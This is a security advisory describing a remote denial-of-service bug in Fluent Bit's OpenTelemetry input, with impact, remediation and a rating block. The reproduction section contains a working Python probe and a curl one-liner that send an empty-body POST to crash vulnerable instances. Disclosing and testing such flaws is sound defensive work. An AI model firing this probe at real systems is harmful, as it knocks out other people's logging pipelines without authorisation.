Fluent Bit OpenTelemetry Input Plugin Remote Denial-of-Service Vulnerability

Vulnerability

A remote denial-of-service vulnerability has been identified in Fluent Bit versions through 3.1.9. When the OpenTelemetry input plugin is enabled and listening on an IP address and port, an HTTP request carrying a Content-Length header of 0 (an empty body) crashes the Fluent Bit process. The plugin does not handle the zero-length case correctly and dereferences a NULL pointer while processing the request. No authentication is involved: any client that can reach the listening endpoint can trigger the crash.

Impact

Exploitation of this vulnerability crashes the Fluent Bit process, producing a denial-of-service condition in which the service becomes unresponsive or unavailable. Because Fluent Bit runs its inputs, filters and outputs in a single process, the crash stops every pipeline the instance handles, not only OpenTelemetry ingestion, and a supervisor that restarts the process only buys time until the next request with an empty body arrives.

Reproduction

The vulnerability can be reproduced by sending an HTTP POST request to an OpenTelemetry input plugin endpoint with the Content-Length header set to 0 and no body. This can be done with tools such as curl or Burp Suite; note that the client must actually emit the Content-Length: 0 header, since a bodiless request without that header does not exercise the faulty code path. Run the check only against an instance you own or are authorised to test, because a vulnerable instance will go down on the first request.
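The probe below is an added example for this advisory, not Fluent Bit's own code or test suite. It hand-builds the HTTP request so the Content-Length: 0 header is sent exactly as written, classifies what comes back (a status line from a patched build, a socket closed with no reply from a crashing one), and then checks whether the listener is still up. The default host and port (127.0.0.1:4318) and the OTLP/HTTP paths /v1/traces, /v1/metrics and /v1/logs are assumptions taken from the OpenTelemetry protocol, not from this page.

```python
"""Probe for the Fluent Bit OpenTelemetry input zero-length-body crash.

Added example for this advisory, not Fluent Bit's own code or test suite.
Assumed (not stated on the page): the input listens on plain HTTP, by
default on port 4318, and serves the OTLP/HTTP paths /v1/traces,
/v1/metrics and /v1/logs.  Host, port and path are arguments.
Only point this at an instance you own or are authorised to test: on a
vulnerable build a single probe crashes the whole Fluent Bit process.
"""
import socket

OTLP_PATHS = ("/v1/traces", "/v1/metrics", "/v1/logs")


def build_probe(host: str, port: int, path: str = "/v1/traces") -> bytes:
    """Raw HTTP/1.1 POST with an explicit Content-Length: 0 and an empty body.

    Built by hand rather than with http.client so the header goes out exactly
    as written; some client libraries omit Content-Length for a bodiless
    request, which would not exercise the bug.
    """
    head = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}:{port}",
        "Content-Type: application/x-protobuf",
        "Content-Length: 0",
        "Connection: close",
    ]
    return ("\r\n".join(head) + "\r\n\r\n").encode("ascii")


def classify(reply: bytes, closed_by_peer: bool) -> str:
    """Interpret what came back from the probe.

    A patched build answers with an HTTP status line (400 is the natural
    reply to an empty body).  A crashing process closes the socket without
    writing anything, so 'closed-without-response' is the crash signature;
    'timeout' means neither happened before the deadline.
    """
    if reply.startswith(b"HTTP/1."):
        return "responded"
    if closed_by_peer and not reply:
        return "closed-without-response"
    return "timeout" if not reply else "unexpected-data"


def send_probe(host: str, port: int, path: str = "/v1/traces",
               timeout: float = 3.0) -> str:
    """Send one zero-length POST and classify the outcome."""
    reply = b""
    closed_by_peer = False
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host, port, path))
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:            # orderly close (FIN) from the server
                    closed_by_peer = True
                    break
                reply += chunk
        except ConnectionResetError:     # RST: the process died mid-request
            closed_by_peer = True
        except socket.timeout:
            pass
    return classify(reply, closed_by_peer)


def is_listening(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if something still accepts TCP connections on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 4318
    for path in OTLP_PATHS:
        if not is_listening(host, port):
            print(f"{host}:{port} is down before probing {path}; stopping")
            break
        verdict = send_probe(host, port, path)
        alive = is_listening(host, port)
        print(f"{path}: {verdict}; listener still up afterwards: {alive}")
        if verdict == "closed-without-response" and not alive:
            print("crash reproduced: endpoint vanished after a Content-Length: 0 POST")
            break
```

Usage: `python3 probe.py 127.0.0.1 4318` against a test instance. A patched build reports "responded" and the listener stays up; a vulnerable build reports "closed-without-response" followed by the listener disappearing. The equivalent one-liner with curl is `curl -d '' http://127.0.0.1:4318/v1/traces`, since an empty `-d ''` makes curl send an explicit Content-Length: 0 header, whereas `-X POST` alone without data does not.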

Remediation

Users can upgrade to Fluent Bit 4.0.1 or 4.0.3, both of which include a patch for this vulnerability. Until the upgrade is in place, exposure can be reduced by binding the OpenTelemetry input's listen address to a trusted interface and restricting network access to its port, since any client that can reach the endpoint can trigger the crash.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 6.6
impact: 2.5
exploitability: 6.0
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.